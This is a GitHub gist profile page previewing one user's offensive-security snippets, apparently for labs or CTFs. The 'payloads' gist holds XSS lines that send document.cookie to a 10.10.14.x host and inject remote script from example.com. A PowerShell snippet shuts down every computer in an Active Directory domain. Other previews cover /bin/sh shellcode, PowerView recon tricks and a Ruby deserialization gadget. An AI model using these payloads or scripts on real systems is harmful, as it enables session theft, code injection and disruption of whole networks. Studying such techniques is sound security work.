Skip to content

Instantly share code, notes, and snippets.

View diego-tella's full-sized avatar

Diego Tellaroli diego-tella

104 followers · 33 following
View GitHub Profile
@diego-tella
diego-tella / shellcode
Last active April 12, 2025 14:38
/*
* Execute /bin/sh - 27 bytes
* Dad` <3 baboon
;rdi 0x4005c4 0x4005c4
;rsi 0x7fffffffdf40 0x7fffffffdf40
;rdx 0x0 0x0
;gdb$ x/s $rdi
;0x4005c4: "/bin/sh"
;gdb$ x/s $rsi
;0x7fffffffdf40: "\304\005@"
@diego-tella
diego-tella / dump-stack.asm
Created June 5, 2024 19:41
dump-stack.asm
global _start
section .text
_start:
mov rax, 1
mov rdi, 1
pop rsi
mov rdx, 64
syscall
@diego-tella
diego-tella / Binary_search.py
Last active May 16, 2024 19:10
Binary search
import sys
def binarySearch(arr, value):
left = 0
right = len(arr)
while left <= right:
mid = int((left + right) / 2)
if arr[mid] == value:
return mid
elif arr[mid] > value: #caso o valor seja menor que o meio, logo vai pra esquerda
@diego-tella
diego-tella / gist:a00ea5b06cb45a66201188cf941af7a2
Created May 10, 2024 12:37
Assembly Stack Overflow
;https://en.wikipedia.org/wiki/Stack_overflow
global _start
section .text
_start:
push 0xb0b0ca
jmp _start
@diego-tella
diego-tella / payloads
Last active March 7, 2025 13:58
<img src="" id="kek"><script>var hue = "http://10.10.14.14/"+document.cookie;document.getElementById("kek").src=hue</script>
<img/src=x onerror="window.location.replace('http://10.10.14.74/aaabcd'.concat(document.cookie));">
/*Importing script*/
<img src/onerror=import('http:example.com')>
<img src/onerror=s=document.createElement('script');s.src='http://example.com/X.js';document.body.appendChild(s)>
@diego-tella
diego-tella / xorBrute.py
Created February 5, 2024 14:49
import sys
number = int(sys.argv[1])
for i in range(1,255):
print("Chave: "+str(i)+" - "+str(number^i))
@diego-tella
diego-tella / Program.cs
Created January 15, 2024 15:13
Fuck Race Condition
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace testeRaceCondition
{
class Program
{
@diego-tella
diego-tella / turnoff.ps1
Last active December 20, 2023 13:33
Turn off all computers from a Active Directory
$computers = Get-ADComputer -Filter * -Property Name | Select-Object -ExpandProperty Name
foreach ($computer in $computers) {
shutdown -s -t 0 -m "\\$computer"
}
@diego-tella
diego-tella / PowerView-3.0-tricks.ps1
Created August 17, 2023 16:35 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@diego-tella
diego-tella / README.md
Created March 16, 2023 01:18 — forked from staaldraad/README.md

Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/

Doesn't work to use YAML.dump(payload) in the above script. This only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
 version: '0'